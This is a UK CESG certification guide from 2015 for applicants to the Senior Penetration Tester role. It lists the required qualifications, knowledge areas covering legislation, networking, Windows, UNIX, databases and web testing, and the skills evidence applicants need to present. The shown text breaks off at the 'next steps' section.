Application Guidance - CCP Penetration Tester Role, Senior Level
Issue No: 1.0 April 2015
This document is for the purposes of issuing advice to UK Government, public and private sector organisations and/or related organisations. The copying and use of this
document for any other purpose, such as for training purposes, is not permitted without the prior approval of CESG.
The copyright of this document is reserved and vested in the Crown.
Document History
Version Date Comment
1.0 April 2015 First issue
Page 1
Application Guidance - CCP Penetration Tester Role,
Senior Level
Purpose & Intended Readership
This document is intended as a guide on how to structure evidence when applying for certification under the CESG Certification for IA Professionals (CCP) scheme as a Penetration Tester at Senior level and includes suggestions of what you need to learn and know before applying. It complements the publications ‘CESG Certification for IA Professionals’ (reference [a]) and the CESG ‘Guidance to Certification for IA Professionals’ (reference [b]).
Executive Summary
CESG has developed a framework for certifying Information Assurance (IA) Professionals who meet competency and skill requirements for specified IA roles. The purpose of certification is to enable better matching between requirements for IA Professionals and the competence and skills of those undertaking common IA roles. The framework was developed in consultation with Government departments, academia, industry, the certification bodies and members of the CESG Listed Adviser Scheme (CLAS). The framework includes a set of IA role definitions and a certification process. This document provides guidance for applicants for certification as a CCP Penetration Tester at Senior level.
Feedback CESG Information Assurance Standards and Guidance welcomes feedback and encourage readers to inform CESG of their opinions, positive or otherwise, in respect to the content of this document. Please email: [email protected]
Page 2
Application Guidance - CCP Penetration Tester Role,
Senior Level
Contents:
Overall Requirements for the Penetration Tester Role, Senior Level .................. 3
Key Principles .......................................................................................................... 3 Role Purpose ........................................................................................................... 3 Senior Penetration Tester – Skills Framework for the Information Age (SFIA) Responsibility Level 4 .............................................................................................. 4
Role Headline Statement ...................................................................................... 4 Qualifications ........................................................................................................ 4 Senior Penetration Tester - Headline Statement .................................................. 4
Knowledge Requirements –Overall Requirements .................................................. 6 Knowledge Requirements for the Penetration Tester Role ...................................... 7
Knowledge Requirements - Engagement, Legislation & Risk ............................... 7 Knowledge Requirements - Core Technical Knowledge ....................................... 9
Knowledge Requirements - Information Gathering ............................................. 11 Knowledge Requirements - Networking ............................................................. 12
Knowledge Requirements - Microsoft Windows Security Assessment ............... 14 Knowledge Requirements - UNIX Security Assessment .................................... 16
Knowledge Requirements - Databases .............................................................. 18 Knowledge Requirements - Web Technologies .................................................. 19 Knowledge Requirements - Physical Access & Security .................................... 21
Knowledge Requirements - Web Application Security Assessment ................... 22 Skills ...................................................................................................................... 23
Experience ............................................................................................................. 30
The Certification Process – next steps ................................................................. 31
The CCP Scheme Certification Learning Cycle ................................................... 35
References .............................................................................................................. 36
Glossary .................................................................................................................. 37
Page 3
Application Guidance – CCP Penetration Tester Role, Senior Level
Overall Requirements for the Penetration Tester Role, Senior Level
Key Principles
This document is intended as a guide on how to structure evidence when applying for certification as a Penetration Tester at Senior level in the CESG Certification for IA Professionals (CCP) scheme. It includes suggestions of what you need to learn and know before applying and complements the ‘CESG Certification for IA Professionals’ (reference [a]) and ‘Guidance to CESG Certification for IA Professionals’ (reference [b]) publications, for which see http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx Learning comes through acquiring skills and knowledge (from training, experience and learning from others doing the same job) and then putting these into practice. Most people will need a few years to acquire these, although in some cases this period may be longer or shorter. The section on skills provides prompts for evidence to demonstrate that you meet the required standards. You are encouraged to follow the advice in this section when completing your written submission.
Role Purpose
Penetration testing is an independent assessment of the different elements that comprise an information system or product with the goal of finding and documenting any vulnerabilities present. The resultant report is considered together with threat reports and other information sources to derive a risk assessment that can be used to drive security improvements. The role of a Penetration Tester is to:
ensure that any testing activity is lawful, compliant with all relevant regulations and within the agreed scope
conduct technical security tests against the information system or product with the aim of identifying vulnerabilities
communicate the results of the tests at a level tailored to the audience
provide technical consultancy and recommendations to customers as to how any reported vulnerabilities could be mitigated
Page 4
Application Guidance – CCP Penetration Tester Role, Senior Level
Senior Penetration Tester – Skills Framework for the Information Age (SFIA) Responsibility Level 4
Role Headline Statement
Enables and contributes to the successful delivery of penetration testing services
Qualifications
The following qualifications are recognised by CESG as demonstrating compliance with the Senior Penetration Tester knowledge requirements. An applicant for this role must therefore hold at least one of the following mandatory qualifications which must be valid (i.e. the qualification must not have expired) when the assessment is made by the Certification Body (CB):
Cyber Scheme Team Member
Tiger Scheme Qualified Security Team Member
Crest Registered Tester
GCHQ Senior Penetration Tester
Senior Penetration Tester - Headline Statement
scopes penetration tests accurately, allocating resources and ensuring personal compliance with relevant legislation and standards
works autonomously and under general direction, delivering accurate technical results in accordance with a scope and test plan
performs a broad range of complex penetration tests that demonstrate an analytical and systematic approach
applies knowledge of configuration errors, vulnerabilities and coding flaws to create and execute a series of tests to validate the security of a system or product
communicates penetration test results to both technical and non-technical audiences, facilitating collaboration between stakeholders where necessary. Influences peers and customers by delivering presentations, papers and reports on the results of penetration testing
Page 5
Application Guidance – CCP Penetration Tester Role, Senior Level
understands information technology and actively maintains awareness of developments in the penetration testing and information security fields
participates in technical and/or professional development activities beyond his/her own team, sharing knowledge with colleagues to improve the penetration testing service
This diagram gives an overall picture of the different elements of Information Assurance and their interdependence. Penetration Testers need to work with others to understand the organisation’s environment and risk appetite in order to scope and influence testing. They also need effective communication skills to present their advice in a way that their clients can understand and use.
Page 6
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements –Overall Requirements
The following are examples of background knowledge which a Penetration Tester should maintain:
Information classification and protective markings
Risk assessment tools, techniques and methodologies, business impact levels, risk controls (preventive, detective, corrective); sources of assurance (intrinsic, extrinsic, operational)
Vulnerability detection tools
Current research trends
Applicable risk appetite and risk tolerance
Information systems engineering and development practices
What good and bad security look like and how to factor security into the system development lifecycle
Common causes of security incidents
Incident management
Common sources of information to support security incident investigation
Preservation of evidence for use in formal procedures
Local business objectives
More detail is provided in the following pages.
Page 7
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements for the Penetration Tester Role
Knowledge Requirements - Engagement, Legislation & Risk
1
5
Engagement Life-Cycle – understands:
the penetration testing life-cycle, from the initial client contact to the delivery of the final report and subsequent consultancy work
the structure of a penetration test, including all relevant processes and procedures
the different types of penetration test, such as infrastructure and application, white- and black-box
penetration testing methodologies, including those defined by the tester’s employer, together with recognised standards, such as those required in the CHECK Scheme
and knows how to:
articulate the benefits a penetration test will bring to a client and accurately convey the results of the penetration testing in a verbal de-brief and written report
Scoping – understands:
client requirements and can produce an accurate and adequately resourced penetration testing proposal
technical, logistical, financial and other constraints, and how to take these into account without compromising the effectiveness of the penetration test
Legal Matters – understands:
the legislation pertaining to penetration testing and can give examples of compliance/non-compliance. This legislation includes: Computer Misuse Act 1990; Data Protection Act 1998; Human Rights Act 1998; Police and Justice Act 2006; Police and Criminal Evidence Act 1984; Regulation of Investigatory Powers Act 2000; Telecommunications (Lawful Business Practice (Interception of Communications Regulations)) 2000
the impact this legislation has on the penetration testing process, the ethical issues associated with penetration testing, as well as understanding non-disclosure agreements and how to comply with their requirements
Page 8
Application Guidance – CCP Penetration Tester Role, Senior Level
Understanding & Mitigating Risk – understands:
the risks associated with a penetration test and how these can be mitigated
the importance of availability & how the risk of a denial-of-service can be reduced
the importance of client confidentiality Record Keeping and Reporting – understands:
the reporting requirements mandated by internal and external standards
the importance of keeping accurate and structured records during a penetration test, including the output from tools
the security requirements associated with record keeping, both during the penetration test and following the delivery of the final report and knows how to:
write an appropriately tailored report from the information gathered during a penetration test
categorise vulnerabilities with respect to recognised methodologies Platform Preparation – knows how to:
prepare for a penetration test with regard to the required hardware and software
ensure that all necessary hardware is available, including laptops, switches, media converters and wireless devices and that all operating systems and testing tools are relevant and up-to-date
avoid data cross-contamination, e.g. by sanitising a hard disk prior to deployment or taking an image from a master build
Page 9
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Core Technical Knowledge
IP Protocols – understands:
IPv4 and IPv6 and their associated security attributes
common IP/Ethernet protocols and their associated security attributes, including: TCP, UDP, ICMP, ARP, DHCP, DNS, CDP, HSRP, VRRP, VTP, STP and TACACS+
the security implications of using clear-text protocols, such as Telnet and FTP File System Permissions and System Processes – understands:
how to demonstrate the manipulation of file system permissions on UNIX-like and Windows operating systems
how insecure file system permissions can be exploited to escalate privileges and/or gain further access to a host
how to find “interesting” files on an operating system, e.g. those with insecure or “unusual” permissions, or containing user account passwords
how to identify running processes on UNIX-like and Windows operating systems and exploit vulnerabilities to escalate privileges Cryptography – understands:
cryptography and its use in a networked environment
common encrypted protocols and software applications, such as SSH, SSL, IPSEC and PGP
wireless protocols that support cryptographic functions, including: WEP, WPA, WPA2, TKIP, EAP, LEAP, PEAP and their associated security attributes and how they can be attacked
the differences between symmetric and asymmetric cryptography and can give examples of each
common cryptographic algorithms, such as DES, 3DES, RSA and AES, including their security attributes and how they can be attacked
common hash functions, such as MD5 and SHA1, including their security attributes and how they can be attacked
Message Authentication Codes (MACs) and Hashed MACs (HMACs)
Page 10
Application Guidance – CCP Penetration Tester Role, Senior Level
Pivoting – understands:
the concept of pivoting through compromised devices
how to demonstrate pivoting through a number of devices in order to gain access to targets on a distant subnet Using Tools and Interpreting Output – understands:
how to use a variety of tools during a penetration test, selecting the most appropriate tool to meet a particular requirement and interpret and understand the output of tools, including those used for port scanning, vulnerability scanning, enumeration, exploitation and traffic capture
Packet Generation – understands:
the different types of packets that are likely to be encountered during a penetration test
ARP spoofing and how to demonstrate this technique in a safe and reliable way
how to generate arbitrary packets, including TCP, UDP, ICMP and ARP, modifying packet parameters as required, e.g. source and destination IP addresses, source and destination ports, and TTL
Service Identification – understands:
how to identify the network services offered by a host and state the purpose of an identified network service and determine its type and version
Fingerprinting – understands:
active and passive operating system fingerprinting techniques and how to demonstrate their use during a penetration test Traffic filtering and Access Control – understands:
network traffic filtering and where this may occur in a network and the devices and technology that implement traffic filtering, such as firewalls and how to advise on their configuration
how to demonstrate methods by which traffic filters can be bypassed
network access control systems, such as 802.1x and MAC address filtering and how these technologies can be bypassed
Patch Levels – understands:
how to obtain operating system patch levels on UNIX-like and Windows operating systems
Page 11
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Information Gathering
Domain Registration – understands:
the format of a WHOIS record and how to obtain such a record to derive information about an IP address and/or domain DNS – understands:
the Domain Name Service (DNS) including queries and responses, zone transfers, and the structure and purpose of records, including: SOA, NS, MX, A, CNAME; PTR, TXT and HINFO
how to demonstrate how a DNS server can be queried to obtain the information detailed in these records and reveal other information that might reveal target systems or indicate the presence of security vulnerabilities
Web Site Analysis – understands:
how to interrogate a website to obtain information about a target network, such as the name and contact details of the network administrator Search Engines, News Groups and Mailing Lists – understands:
how to use search engines, news groups, mailing lists and other services to obtain information about a target network, such as the name and contact details of the network administrator
Information Leakage – understands:
how to obtain information about a target network from information leaked in email headers, HTML meta tags and other locations, such as an internal network IP address
Banner Grabbing – understands:
how to enumerate services, their software types and versions, using banner grabbing techniques SNMP – understands:
how to retrieve information from SNMP services and understands the MIB structure pertaining to the identification of security vulnerabilities
Page 12
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Networking
Network Architecture – understands:
network architectures and logical network diagrams
the security benefits of tiered architectures, DMZs and air-gaps
the security implications of shared media and can exploit its vulnerabilities during a penetration test Network Routing – understands:
network routing and its associated protocols, including: RIP, OSPF, IGRP, EIGRP, BGP, EGP, IGMP
the security attributes of these protocols Network Mapping – understands:
how to demonstrate the mapping of a network using a range of tools, such as traceroute, tcptraceroute and ping, by querying active services, such as DNS and SNMP servers
how to present the map as a logical network diagram, detailing all discovered subnets and interfaces, including routers, switches, hosts and other devices
how to accurately identify all hosts on a target network that meet a defined set of criteria, e.g. to identify all FTP servers or CISCO routers Management Protocols – understands:
how to demonstrate the use of protocols often used for the remote management of devices including Telnet, SSH, HTTP/HTTPS, SNMP, TFTP, NTP
the security attributes of these protocols
how to demonstrate how these services can be exploited to gain access to a device or derive further information about the target network, e.g. SNMP service enumeration or the exploitation of a vulnerable CISCO HTTP server
Traffic analysis – understands:
how to intercept and monitor network traffic, capturing it to disk in a format required by analysis tools
how network traffic can be analysed to recover user account credentials and detect vulnerabilities that may lead to the compromise of a target device
Page 13
Application Guidance – CCP Penetration Tester Role, Senior Level
Configuration Analysis – understands:
configuration files of CISCO routers and switches and can advise on how their security can be approved (most common features, such as access-lists and enabled services)
how to interpret the configuration files of other network devices, including those produced by a variety of vendors (most common features, such as access-lists and enabled services)
Routers and Switches – understands:
how to demonstrate the exploitation of vulnerabilities in routers and switches, including the use of the following protocols: Telnet, HTTP/HTTPS, TFTP, SNMP
VoIP – understands:
VoIP services, such as SIP, and can identify and fingerprint devices offering these services
Page 14
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Microsoft Windows Security Assessment
Reconnaissance – understands how to:
identify Windows hosts on a target network
identify domains, domain controllers, domain members and workgroups
enumerate accessible Windows shares Enumeration – understands how to:
perform user and group enumeration on target systems and domains, using protocols including: NetBIOS, LDAP, and SNMP
obtain other information, such as password policies Active Directory – understands:
Active Directory
Group Policy
Local Security Policy
user accounts and how to manipulate these accounts to gain further access to a target system, e.g. by escalating privileges from a domain user to a domain admin
Page 15
Application Guidance – CCP Penetration Tester Role, Senior Level
Passwords – understands:
password policies, including complexity requirements and lock-out
how to avoid causing a denial-of-service by locking-out accounts
Windows password hashing algorithms and their associated security attributes
how passwords are stored and protected and can demonstrate how they can be recovered
off-line password cracking using dictionary and brute-force attacks, including the use of rainbow tables, and how to demonstrate this and the recovery of password hashes when given physical access to a Windows host
Remote Vulnerabilities – understands:
the remote exploitation of Windows operating system and third-party software application vulnerabilities and how to demonstrate this
Local Vulnerabilities – understands how to demonstrate:
the local exploitation of Windows operating system and third-party software application vulnerabilities
local privilege escalation techniques, e.g. through the manipulation of insecure file system permissions Post exploitation – understands how to demonstrate:
common post-exploitation activities including: password recovery, including cached credentials, lateral movement and domain compromise, the checking of operating system and third party software application patch levels
Desktop Lockdown – understands:
the concept of desktop lockdown and how to demonstrate how a user can break-out of a locked down environment Patch Management – understands:
common patch and software management techniques and applications, including WSUS and Altiris
Page 16
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - UNIX Security Assessment
Reconnaissance – understands how to:
identify UNIX hosts on a target network Enumeration – understands how to:
perform user enumeration on target system using a variety of techniques, including remote login protocols, SMTP, finger and SNMP
perform file system enumeration on a target system, using a variety of techniques, including remote login protocols, FTP, HTTP, NFS and TFTP
enumerate RPC services & identify those with known security vulnerabilities
show awareness of legacy user enumeration techniques such as rusers and rwho Passwords – understands:
users, groups and password policies, including complexity requirements and lock-out
how to avoid causing a denial-of-service by locking-out accounts
the format of the passwd, shadow, group and gshadow files
UNIX password hashing algorithms and their associated security attributes
how passwords are stored and protected and can demonstrate how they can be recovered
off-line password cracking using dictionary and brute-force attacks, and how to demonstrate this
how to demonstrate the recovery of password hashes when given physical access to a UNIX host Remote Vulnerabilities – understands:
how to demonstrate the remote exploitation of Solaris & Linux operating system vulnerabilities (several key remote vulnerabilities are detailed individually within this section)
Local Vulnerabilities – understands how to demonstrate:
the local exploitation of Solaris and Linux operating system vulnerabilities
local privilege escalation techniques, e.g. through the manipulation of insecure file system permissions
Page 17
Application Guidance – CCP Penetration Tester Role, Senior Level
Post exploitation – understands how to:
demonstrate common post-exploitation activities including: password recovery, lateral movement, the checking of operating system and third party software application patch levels
FTP/TFTP – understands:
FTP and how to demonstrate how a poorly configured FTP server can be exploited, eg the downloading of arbitrary files, the uploading and over-writing of files, and the modification of file system permissions
TFTP and how to demonstrate how a poorly-configured TFTP server can be exploited, e.g. the downloading of arbitrary files, the uploading and over-writing of files
NFS – understands:
NFS and its associated security attributes, and how to demonstrate how exports can be identified
How to demonstrate how a poorly configured NFS service can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, eg through the creation of SUID-root files, the modification of files and file system permissions and UID/GID manipulation
Berkeley r-Services – understands:
the Berkeley r-services and their associated security attributes and how to demonstrate how trust relationships can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of .rhosts and/or /etc/hosts.equiv files
SSH – understands:
SSH and its associated security attributes, including the different versions of the protocol, version fingerprinting and how the service can be used to provide a number of remote access services
how to demonstrate how trust relationships can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of ~/.ssh/authorised_keys files
X – understands:
X and its associated security attributes, and how to demonstrate how insecure sessions can be exploited, e.g. by obtaining screen shots, capturing keystrokes and injecting commands into open terminals
Page 18
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Databases
Microsoft SQL Server – understands how to demonstrate:
the remote exploitation of Microsoft SQL server
how access can be gained to a Microsoft SQL server through the use of default accounts credentials and insecure passwords
how to identify and extract useful information stored within a database (e.g. user account names and passwords, recovering passwords where possible)
following the compromise of Microsoft SQL server, how to use stored procedures to execute system commands, escalate privileges, read/write from/to the file system, and/or gain further access to a host
Oracle – understands:
how to demonstrate the remote exploitation of an Oracle database
the security attributes of the Oracle TNS Listener service
how to demonstrate how access can be gained to an Oracle database server through the use of default accounts credentials and insecure passwords
how to identify and extract useful information stored within a database (e.g. user account names and passwords, recovering passwords where possible)
how the software version and patch status can be obtained from an Oracle database
following the compromise of an Oracle database server, how to use stored procedures to execute system commands, escalate privileges, read/write from/to the file system and/or gain further access to a host
Other Database Servers – understands how to demonstrate:
the remote exploitation of other common database servers, such as MySQL and PostgreSQL
how access can be gained to such a database server through the use of default accounts credentials and insecure passwords
how to identify and extract useful information stored within a database (e.g. user account names and passwords, recovering passwords where possible)
Page 19
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Web Technologies
Web Servers – understands:
how to identify web servers on a target network and remotely determine their type and version
how to demonstrate the remote exploitation of web servers
the purpose, operation, limitation and security attributes of web proxy servers Protocols and Methods – understands:
how to demonstrate the use of web protocols, including HTTP, HTTPS, SOAP
how the insecure implementation of software developed using these languages can be exploited
All HTTP methods and response codes Reconnaissance – understands:
the purpose of website and application reconnaissance
how to discover the structure of a website and application Languages – understands:
common web mark-up and programming languages, including .NET, ASP, Perl, PHP, JSP, Javascript
how the insecure implementation of software developed using these languages can be exploited (candidate may select two languages) APIs – understands how to demonstrate:
the use of web-based APIs to remotely access remote services
how the insecure implementation of web-based APIs can be exploited Information Gathering – understands how to:
gather information from a website and application mark-up or programming language, including: hidden form fields, database connection strings, user account credentials, developer comments, external and/or authenticated-only URLs
gather information about a website and application from the error messages it generates
Page 20
Application Guidance – CCP Penetration Tester Role, Senior Level
Authentication – understands:
common authentication and access-control mechanism vulnerabilities and how to give examples of common vulnerabilities and implementation best practice
Input Validation – understands:
the importance of input validation and how it can be implemented, e.g. white-lists, black-lists and regular expressions Fuzzing – understands:
fuzzing and its use in web application testing
the generation of fuzzing strings and their potential effects, including the dangers they may introduce XSS – understands:
cross-site scripting (XSS) and can demonstrate the launching of a successful XSS attack Injection – understands:
injection vulnerabilities, including: code injection, SQL injection, XML injection Blind SQL injection – understands:
blind SQL injection vulnerabilities Sessions – understands:
how sessions are managed and can give examples of common vulnerabilities and implementation best practice Cryptography – understands:
how cryptography can be used to protect data in transit and data at rest, both on the server and client side
the concepts of SSL and can determine whether an SSL-enabled web server has been configured in compliance with best practice (i.e. it supports recommended ciphers and key lengths)
Code Review – understands:
the techniques for identifying vulnerabilities in source code
Page 21
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Physical Access & Security
Locks – understands:
how locks can be used to restrict access to computer hardware Tamper seals – understands:
how tamper seals can be used to deter access to computer hardware Platform Integrity – understands:
platform integrity technologies, e.g. TPM
Boot Sequence – understands:
the BIOS boot sequence and how to obtain privileged access to an operating system by exploiting vulnerabilities in a boot sequence configuration, e.g. booting from removable media or enabling PXE boot
Disk Encryption – understands:
the security implications of unencrypted storage devices, such as hard disks
how to demonstrate how data can be recovered from unencrypted storage devices, and how such data can be manipulated to introduce vulnerabilities into an operating system
Recovery Functionality – understands:
the security attributes of operating system recovery functionality, e.g. Windows Recovery Console and Safe Mode Multi-Factor Authentication – understands:
multi-factor authentication systems, such as tokens and SMS
Page 22
Application Guidance – CCP Penetration Tester Role, Senior Level
Knowledge Requirements - Web Application Security Assessment
The knowledge requirements for Web Application Security Assessment apply to those who demonstrate this particular technical specialism within the wider Penetration Tester role. It is acknowledged that such a specialism may result in a penetration tester having a lesser understanding of the knowledge requirements detailed in the sections on Networking, Microsoft Windows Security Assessment and Unix Security Assessment. This is captured by the providers of the mandatory qualifications detailed within the role definition and need not be further explored by the Certification Body. The knowledge requirements for Web Application Security Assessment are defined in the OWASP Testing Guide v4. See http://www.owasp.org/ for further information and to obtain a copy of this guide. To avoid duplication, these requirements have not been repeated in this document; however, the mandatory sections to be included and the associated knowledge requirements are detailed below: S
Section Title
4.2 Information Gathering
4.3 Configuration and Deploy Management Testing
4.4 Identity Management Testing
4.5 Authentication Testing
4.6 Authorisation Testing
4.7 Session Management Testing
4.8 Data Validation Testing
4.9 Error Handling
4.10 Cryptography
4.11 Logging
4.12 Business Logic Testing
4.13 Denial- of-Service
4.14 Web Service Testing
4.15 Client Site Testing
Page 23
Application Guidance – CCP Penetration Tester Role, Senior Level
Skills
When presenting your skills evidence, use the ‘STAR’ format: ‘Situation, Task, Action, Result’
Use a narrative form, e.g. ‘... I produced ...My decision was...’
Explain what accreditation decision you made and how the measures you required were proportionate and effective
You must meet the required levels at all 4 core skills - (A2 Policy & Standards, D2 Security Testing, E3 Vulnerability Assessment, I3 Applied Research)
In addition to all the core skills, you must meet 75% of the non-core skills
A single piece of work may be used for several skills, but a variety of examples gives better evidence of being able to work in more than one situation.
The following table provides suggestions for starting points in evidence.
Technical Skills
SKILL EVIDENCE OF SKILL A1 – Governance Level 1 Understands local arrangements for Information Governance (IG)
Give examples of how your penetration testing was in accordance with the policies, processes and procedures of an organisation you’ve worked for, which were designed to protect information assets during and after penetration testing. Give an example of how a customer’s processes and controls affected the way you carried out penetration testing – e.g. a customer requested that you did not perform any exploitation.
A2 – Policy & Standards, Level 1 - core skill Understands the need for policy and standards to achieve Information Security (IS)
Give examples of:
your use of IS and other, non-technical, policies and standards. How did penetration testing fit within these requirements?
how did you ensure that your penetration testing was in accordance with recognised
methodologies, e.g. OWASP?
A3 – Information Security Strategy Level 1 Understands the purpose of IS strategy to realise business benefits
Explain how in your experience local information security strategy has affected the technical security environment in a positive or negative way.
Page 24
Application Guidance – CCP Penetration Tester Role, Senior Level
SKILL EVIDENCE OF SKILL A4 – Innovation & Business Improvement Level 1 Is aware of the business benefits of good IS
How have risk mitigations which you have advised on benefitted the organisation (e.g. in terms of reduced costs/risk or more effective monitoring etc)?
A5 – IS Awareness & Training Level 1 Understands the role of security awareness and training in maintaining Information Security
Give examples where you have seen the effectiveness of security awareness programmes, for example whether they made an organisation more or less vulnerable to a successful social engineering attack.
A6 – Legal & Regulatory Environment Level 2 Understands applicable legislation and regulations relating to IS in the context of own or client organisations
Give examples from different work environments of how you ensured your work doesn’t contravene relevant statutes and how you explained this to customers. (For example, the Computer Misuse Act prohibits breaking into a system but the contract you were employed on might require or permit this). How did you report the types of material/breaches which you were required to and what were the results of this?
A7 – Third Party Management1 Level 1 Is aware of the need for organisations to manage the information security of third parties
Give examples of any problems you’ve encountered when asked to review something out of scope in a third party system. How did you gain legitimate access? How did you describe the relevance of tests if you were not allowed to access relevant third party systems?
B1 – Risk Assessment Level 2 Understands how to produce information risk assessments
Describe how, as a result of penetration testing, you made an appropriate risk assessment and associate recommendations. What was the outcome of your work?
1 Skill only required if information systems or services are provided by a third party
Page 25
Application Guidance – CCP Penetration Tester Role, Senior Level
SKILL EVIDENCE OF SKILL B2 – Risk Management Level 2 Contributes to management of risks to information systems with supervision
Give examples of how you worked with others to produce recommendations to improve information assurance.
C1 – Security Architecture Level 2 Applies architectural principles to security design with some supervision
Describe how you advised on IA architecture in the development cycle for information security systems. What was the outcome?
C2 – Secure Development Level 1 – Network Infrastructure Penetration Testing Specialist Is aware of the benefits of addressing security during system development
Give examples from your experience of how security and secure development of products and systems were improved by penetration testing.
C2 – Secure Development Level 2 – Web Application Penetration Testing Specialist Contributes to the development of secure systems with some supervision
Give examples of how secure development would have contributed to a better outcome from penetration testing. What examples of poor development standards have you come across? How could these have been improved?
D1 – IA Methodologies Level 1 Is aware of the existence of methodologies, processes and standards for providing Information Assurance
Give examples from your experience of appropriate and proportionate penetration. Give examples of standards, e.g. such as those required in the CHECK Scheme, and/or methodologies and when these should be used.
Page 26
Application Guidance – CCP Penetration Tester Role, Senior Level
SKILL EVIDENCE OF SKILL
D2 – Security Testing Level 2 – core skill Effectively applies testing methodologies, tools or techniques with some supervision
Give examples from a range of work environments of:
the difference between vulnerability assessments and penetration tests you’ve carried out
testing methodologies - and instances when you developed new ones
test plans you developed and how you implemented them, or technical reports you wrote following security testing
E1 – Secure Operations Management, Level 2 Monitors the application of Security Operating Procedures (SyOPs) with some supervision
Give examples of tests you’ve carried out to detect vulnerabilities. How did you ensure that operations were not impacted by the testing, and that alerts which were raised were not mistaken for an actual attack?
E2 – Secure Operations & Service Delivery, Level 2 Effectively applies SyOPs with some supervision
Give examples of how you have influenced a customer to mitigate security risks. How did this affect monitoring and logging controls and escalation procedures? How was security improved?
E3 – Vulnerability Assessment, Level 2 – core skill Obtains and acts on vulnerability information in accordance with SyOPs
Give examples from different work environments of occasions when you identified vulnerabilities in a system or application. What tools and methodologies did you use and how did you make colleagues and/or customers aware of the vulnerabilities? What did you do to mitigate them and what was the outcome? What were the limitations of the vulnerability assessments compared with penetration testing? How often were vulnerability assessments done and was the frequency appropriate? How were the vulnerabilities used to mount exploits?
F1 – Incident Management, Level 2 Contributes to security incident management
Give examples from a range of environments of how you recommended incident management procedures which met a client’s requirements. What role did post incident reviews and CERTs play in your recommendations?
Page 27
Application Guidance – CCP Penetration Tester Role, Senior Level
SKILL EVIDENCE OF SKILL
F2 – Investigation Level 2
Contributes to investigations into security incidents
Give examples of how you contributed to security investigations, eg recommendations you made. How did you present your evidence and how would you recommend that evidence is preserved appropriately? How did you protect client information? How have you reported attacks you’ve discovered during testing and what recommendations did you make? What balance did you strike between recovery and the need for forensic evidence? What remedial actions ensured no further attacks?
F3 – Forensics Level 1
Is aware of the capability of forensics to support investigations
Give examples of:
malware you’ve detected – what testing did you carry out and what did you do with your results?
recovering information from logs, hard discs, etc. What tools and techniques did you use and what legislation or regulations did you have to follow? How did you remain in scope and legal whilst trying to track the perpetrator(s)?
G1 – Audit and Review Level 1
Understands basic techniques for testing compliance with security criteria (policies, standards, legal and regulatory requirements)
Give examples of how you’ve used your understanding of basic techniques for testing compliance with security criteria when developing or reviewing the scope of vulnerability testing.
H1 – Business Continuity Planning and H2 – Business Continuity Management Level 1
Understands how Business Continuity Planning & Management contributes to information security
Describe how you incorporated business continuity management into your vulnerability testing – e.g. out of hours testing, or sampling. How did you include business continuity in your advice on vulnerability mitigations and escalations? Give examples from different work environments to show how you tested whether traditional business continuity plans were fit for purpose in the context of cyber security incidents.
I3 – Applied Research Level 2 – core skill
Performs research activities under supervision
Give examples from different work environments of:
research papers you contributed to
research you’ve carried out – what was the purpose of this and what benefit did it provide?
Page 28
Application Guidance – CCP Penetration Tester Role, Senior Level
PEOPLE SKILLS ‘J skills’ (instead of SFIA levels)
SKILL EVIDENCE OF SKILL J1 – Teamwork and Leadership Level 2.5 Encourages & challenges others. Provides a lead across an organisation
Give examples of:
ways in which you provided a lead in helping teams or individuals to improve work processes. How did you
address conflict if this arose?
J2 – Delivering Level 2.5 Responsible for ensuring delivery is achieved against a portfolio of business objectives, overcoming obstacles to achieve goals
Give examples of :
situations where you ensured that your team or colleagues maintained delivery in challenging circumstances.
What did you do to facilitate timely and responsible delivery?
J3 – Managing Customer Relationships Level 2.5 Works with customers to ensure that their needs drive business plans
Give examples of ways you worked with customers to anticipate and positively influence their needs, so that business plans accommodated customer needs appropriately. This can include times when you negotiated satisfactory compromises
J4 – Corporate Behaviour Level 2.5 Takes action to achieve greater corporate efficiency, in line with strategic aims
Give examples of cost effective and proportionate proposals you’ve made to mitigate security vulnerabilities.
J5 – Change and Innovation Level 2.5 Contributes to change strategies and generates new ideas or approaches, going beyond the local area
Give examples of changes you introduced – what did you do, what techniques did you use and why? What were the outcomes and what would you do differently in the future? How did you consider the impact on other people and processes and try to find ways to acknowledge the opinions of others?
Page 29
Application Guidance – CCP Penetration Tester Role, Senior Level
SKILL EVIDENCE OF SKILL J6 – Analysis and Decision Making Level 2.5 Makes effective decisions and/or solves complex problems in uncertain situations, or where the impact is greater than in the immediate working area
Give examples from different environments of recommendations and solutions you produced where there was no clear process. What problems did you deal with and what was the result?
J7 – Communication and Knowledge Sharing – Level 2.5 Is a persuasive communicator. Sets a lead in sharing knowledge effectively in diverse areas across the organisation
Give examples of how you adapted your communication to suit different media, including face to face, over the phone, emails, presentations and meetings to ensure timely and responsible disclosure e.g.:
publishing reports
stand-up briefings
Board presentations
Risk escalation processes
Participation in security working groups etc. What were the outcomes?
Page 30
Application Guidance – CCP Penetration Tester Role, Senior Level
Experience
Agree a plan with your manager to ensure that you cover the necessary ground, as suggested below.
Your evidence should show that you:
scope complex penetration tests which comply with relevant legislation and standards accurately and allocate resources for these
work autonomously and under general direction and deliver accurate technical results in accordance with a scope and test plan
carry out a broad range of penetration testing, following an analytical and systematic approach
create and execute tests to validate system or product security, applying your knowledge of configuration errors, vulnerabilities and coding flaws
communicate the outcomes and implications of penetration test results to colleagues and/or customers effectively, whether they are technical or non-technical in their knowledge and that you facilitate collaboration between stakeholders where necessary
deliver presentations, papers and reports which influence peers and customers
keep up to date with the latest developments in penetration testing and information security
engage in technical and/or professional development activities beyond your team and share and use that knowledge to improve the penetration testing service in your organisation
Page 31
Application Guidance – CCP Penetration Tester Role, Senior Level
The Certification Process – next steps
